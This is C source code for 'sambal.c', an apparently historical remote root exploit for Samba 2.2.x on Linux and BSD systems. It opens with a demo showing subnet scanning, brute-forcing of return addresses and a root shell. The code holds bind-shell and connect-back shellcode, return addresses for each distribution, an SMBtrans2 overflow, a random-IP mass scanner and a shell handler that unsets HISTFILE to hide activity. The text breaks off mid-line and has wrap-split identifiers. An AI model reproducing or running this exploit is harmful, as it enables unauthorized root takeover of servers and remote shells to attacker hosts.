/* Remote root exploit for Samba 2.2.x and prior that works against Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x and 3.2 non-executable stack). sambal.c is able to identify samba boxes. It will send a netbios name packet to port 137. If the box responds with the mac address 00-00-00-00-00-00, it's probally running samba. [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.20] Windows + [192.168.0.21] Samba + [192.168.0.30] Windows + [192.168.0.31] Samba + [192.168.0.33] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows ... + [192.168.0.133] Samba Great! You could now try a preset (-t0 for a list), but most of the time bruteforce will do. The smbd spawns a new process on every connect, so we can bruteforce the return address... [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Verbose mode. + Bruteforce mode. (Linux) + Using ret: [0xbffffed4] + Using ret: [0xbffffda8] + Using ret: [0xbffffc7c] + Using ret: [0xbffffb50] + Using ret: [0xbffffa24] + Using ret: [0xbffff8f8] + Using ret: [0xbffff7cc] + Worked! -------------------------------------------------------------- Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux uid=0(root) gid=0(root) groups=99(nobody) sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org| */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include typedef struct { unsigned char type; unsigned char flags; unsigned short length; } NETBIOS_HEADER; typedef struct { unsigned char protocol[4]; unsigned char command; unsigned short status; unsigned char reserved; unsigned char flags; unsigned short flags2; unsigned char pad[12]; unsigned short tid; unsigned short pid; unsigned short uid; unsigned short mid; } SMB_HEADER; int OWNED = 0; pid_t childs[100]; struct sockaddr_in addr1; struct sockaddr_in addr2; char linux_bindcode[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05" "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd" "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80" "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0" "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; char bsd_bindcode[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57" "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89" "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50" "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80" "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56" "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd" "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; char linux_connect_back[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; char bsd_connect_back[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; struct { char *type; unsigned long ret; char *shellcode; int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */ } targets[] = { { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 }, { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 }, { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 }, { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 }, { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 }, { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 }, { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 }, { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 }, { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 }, { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 }, { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 }, { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 }, { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 }, { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 }, { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 }, { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 }, { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 }, }; void shell(); void usage(); void handler(); int is_samba(char *ip, unsigned long time_out); int Connect(int fd, char *ip, unsigned int port, unsigned int time_out); int read_timer(int fd, unsigned int time_out); int write_timer(int fd, unsigned int time_out); int start_session(int sock); int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); void usage(char *prog) { fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" "-b bruteforce (0 = Linux, 1 = FreeBSD/Net BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" "-B bruteforce steps (default = 300)\n" "-c connectback ip address\n" "-C max childs for scan/bruteforce mode (d efault = 40)\n" "-d bruteforce/scanmode delay in micro sec onds (default = 100000)\n" "-f force\n" "-p port to attack (default = 139)\n" "-r return address\n" "-s scan mode (random)\n" "-S scan mode\n" "-t presets (0 for a list)\n" "-v verbose mode\n\n", prog); exit(1); } int is_samba(char *ip, unsigned long time_out) { char nbtname[]= /* netbios name packet */ { 0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00, 0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21, 0x00,0x01 }; unsigned char recv_buf[1024]; unsigned char *ptr; int i = 0; int s = 0; unsigned int total = 0; if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1; if(Connect(s, ip, 137, time_out) == -1) { close(s); return -1; } memset(recv_buf, 0x00, sizeof(recv_buf)); if(write_timer(s, time_out) == 1) { if (write(s, nbtname, sizeof(nbtname)) <= 0) { close(s); return -1; } } if (read_timer(s, time_out) == 1) { if (read(s, recv_buf, sizeof(recv_buf)) <= 0) { close(s); return -1; } ptr = recv_buf + 57; total = *(ptr - 1); /* max names */ while(ptr < recv_buf + sizeof(recv_buf)) { ptr += 18; if (i == total) { ptr -= 19; if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & & *(ptr + 3) == 0x00 && *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 & & *(ptr + 6) == 0x00) { close(s); return 0; } close(s); return 1; } i++; } } close(s); return -1; } int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set connect_read, connect_write; struct timeval timeout; int getsockopt_length = 0; int getsockopt_error = 0; struct sockaddr_in server; bzero(&server, sizeof(server)); server.sin_family = AF_INET; inet_pton(AF_INET, ip, &server.sin_addr); server.sin_port = htons(port); if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return -1; } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return -1; } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&connect_read); FD_ZERO(&connect_write); FD_SET(fd, &connect_read); FD_SET(fd, &connect_write); if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) { if(errno != EINPROGRESS) { close(fd); return -1; } } else { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti meout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { getsockopt_length = sizeof(getsockopt_error); if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err or, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; } if(getsockopt_error == 0) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { errno = getsockopt_error; close(fd); return (-1); } } } else { close(fd); return 1; } if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdread; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdread); FD_SET(fd, &fdread); select_status = select(fd + 1, &fdread, NULL, NULL, &timeout); if(select_status == 0) { close(fd); return (-1); } if(select_status == -1) { close(fd); return (-1); } if(FD_ISSET(fd, &fdread)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return 1; } } int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdwrite; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdwrite); FD_SET(fd, &fdwrite); select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &fdwrite)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return -1; } } void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE \";uname -a;id;\n"; int n; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); FD_SET(0, &fd_read); send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break; if (FD_ISSET(sock, &fd_read)) { if((n = recv(sock, buff, sizeof(buff), 0)) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (write(1, buff, n) < 0) break; } if (FD_ISSET(0, &fd_read)) { if((n = read(0, buff, sizeof(buff))) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (send(sock, buff, n, 0) < 0) break; } usleep(10); } fprintf(stderr, "Connection lost.\n\n"); exit(0); } void handler() { int sock = 0; int i = 0; OWNED = 1; for (i = 0; i < 100; i++) if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { close(sock); exit(1); } if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { fprintf(stdout, "+ Worked!\n" "---------------------------------------------- ----------------\n"); shell(sock); close(sock); } } int start_session(int sock) { char buffer[1000]; char response[4096]; char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 \x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 \x6e\x6f\x62\x6f\x64\x79" "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24 "; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x2E); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x73; /* session setup */ smbheader->flags = 0x08; /* caseless pathnames */ smbheader->flags2 = 0x01; /* long filenames supported */ smbheader->pid = getpid() & 0xFFFF; smbheader->uid = 100; smbheader->mid = 0x01; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da ta1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess ion message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); memset(buffer, 0x00, sizeof(buffer)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x3C); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x70; /* start connection */ smbheader->pid = getpid() & 0xFFFF; smbheader->tid = 0x00; smbheader->uid = 100; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da ta2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) return -1; return 0; } int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x90; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex ploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; for (i = 0; i < 4 * 24; i += 8) { memcpy(buffer + 1099 + i, &dummy, 4); memcpy(buffer + 1103 + i, &ret, 4); } memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1800, shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x30; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex ploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1127, &ret, 4); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) ; if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int main (int argc,char *argv[]) { char *shellcode = NULL; char scan_ip[256]; int brute = -1; int connectback = 0; int force = 0; int i = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; int opt = 0; int port = 139; int random = 0; int scan = 0; int sock = 0; int sock2 = 0; int status = 0; int type = 0; int verbose = 0; unsigned long BRUTE_DELAY = 100000; unsigned long ret = 0x0; unsigned long MAX_CHILDS = 40; unsigned long STEPS = 300; struct hostent *he; fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric .org|be)\n" "------------------------------------------------------ --------\n"); while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { switch(opt) { case 'b': brute = atoi(optarg); if ((brute < 0) || (brute > 3)) { fprintf(stderr, "Invalid platform.\n\n" ); return -1; } break; case 'B': STEPS = atoi(optarg); if (STEPS == 0) STEPS++; break; case 'c': sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); connectback = 1; if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) { fprintf(stderr, "Invalid IP address.\n\ n"); return -1; } linux_connect_back[33] = ip1; bsd_connect_back[ 24] = ip1; linux_connect_back[34] = ip2; bsd_connect_back[ 25] = ip2; linux_connect_back[35] = ip3; bsd_connect_back[ 26] = ip3; linux_connect_back[36] = ip4; bsd_connect_back[ 27] = ip4; break; case 'C': MAX_CHILDS = atoi(optarg); if (MAX_CHILDS == 0) { fprintf(stderr, "Invalid number of chil ds.\n"); return -1; } if (MAX_CHILDS > 99) { fprintf(stderr, "Too many childs, using 99. \n"); MAX_CHILDS = 99; } break; case 'd': BRUTE_DELAY = atoi(optarg); break; case 'f': force = 1; break; case 'p': port = atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr, "Invalid port.\n\n"); return -1; } break; case 'r': ret = strtoul(optarg, &optarg, 16); break; case 's': random = 1; scan = 1; break; case 'S': random = 0; scan = 1; sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3); ip3--; break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 16) { for(i = 0; i < sizeof(targets) / 16; i+ +) fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type , (unsigned int) targets[i].ret); fprintf(stderr, "\n"); return -1; } break; case 'v': verbose = 1; break; default: usage(argv[0] == NULL ? "sambal" : argv[0]); break; } } if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) usage(argv[0] == NULL ? "sambal" : argv[0]); if (scan == 1) fprintf(stdout, "+ Scan mode.\n"); if (verbose == 1) fprintf(stdout, "+ Verbose mode.\n"); if (scan == 1) { srand(getpid()); while (1) { if (random == 1) { ip1 = rand() % 255; ip2 = rand() % 255; ip3 = rand() % 255; } else { ip3++; if (ip3 > 254) { ip3 = 1; ip2++; } if (ip2 > 254) { ip2 = 1; ip1++; } if (ip1 > 254) exit(0); } for (ip4 = 0; ip4 < 255; ip4++) { i++; snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% u.%u", ip1, ip2, ip3, ip4); usleep(BRUTE_DELAY); switch (fork()) { case 0: switch(is_samba(scan_ip, 2)) { case 0: fprintf(stdout, "+ [%s] Samba\n", scan_ip); break; case 1: fprintf(stdout, "+ [%s] Windows\n", scan_ip); break; default: break; } exit(0); break; case -1: fprintf(stderr, "+ fork() error \n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } he = gethostbyname(argv[optind]); if (he == NULL) { fprintf(stderr, "Unable to resolve %s...\n", argv[optind]); return -1; } if (brute == -1) { if (ret == 0) ret = targets[type - 1].ret; shellcode = targets[type - 1].shellcode; if (connectback == 1) { fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 95]\n", ip1, ip2, ip3, ip4); switch(targets[type - 1].os_type) { case 0: /* linux */ shellcode = linux_connect_back; break; case 1: /* FreeBSD/NetBSD */ shellcode = bsd_connect_back; break; case 2: /* OpenBSD */ shellcode = bsd_connect_back; break; case 3: /* OpenBSD 3.2 Non-exec stack */ shellcode = bsd_connect_back; break; } } if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { fprintf(stderr, "+ connect() error.\n"); return -1; } if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t ype); if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n \n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( char *)inet_ntoa(addr1.sin_addr), port); if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. \n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); sleep(5); if (targets[type - 1].os_type != 2) { if (exploit_normal(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } else { if (exploit_openbsd32(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } sleep(2); if (connectback == 0) { if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add r2)) == -1) { fprintf(stderr, "+ Exploit failed, try -b to br uteforce.\n"); return -1; } fprintf(stdout, "-------------------------------------- ------------------------\n"); shell(sock2); close(sock); close(sock2); } else { fprintf(stdout, "+ Done...\n"); close(sock2); close(sock); } return 0; } signal(SIGPIPE, SIG_IGN); signal(SIGUSR1, handler); switch(brute) { case 0: if (ret == 0) ret = 0xc0000000; shellcode = linux_bindcode; fprintf(stdout, "+ Bruteforce mode. (Linux)\n"); break; case 1: if (ret == 0) ret = 0xbfc00000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ n"); break; case 2: if (ret == 0) ret = 0xdfc00000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr ior)\n"); break; case 3: if (ret == 0) ret = 0x00170000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- exec stack)\n"); break; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); for (i = 0; i < 100; i++) childs[i] = -1; i = 0; if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } while (OWNED == 0) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (verbose == 1) fprintf(stderr, "+ socket() error.\n" ); } else { ret -= STEPS; i++; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if (verbose == 1) fprintf(stderr, "+ socket() error.\n" ); if ((ret & 0xff) == 0x00 && brute != 3) ret++; if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u nsigned int)ret); usleep(BRUTE_DELAY); switch (childs[i] = fork()) { case 0: if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad dr), port, 2) == -1) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if(write_timer(sock, 3) == 1) { if (start_session(sock) < 0) { if (verbose == 1) fprintf(stder r, "+ Session failed.\n"); if (sock > 2)close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (brute == 3) { if (exploit_openbsd32(sock, ret , shellcode) < 0) { if (verbose == 1) fprin tf(stderr, "+ Failed.\n"); if (sock > 2) close(so ck); if (sock2 > 2) close(so ck2); exit(-1); } } else { if (exploit_normal(sock, ret, shellcode ) < 0) { if (verbose == 1) fprintf(stder r, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (sock > 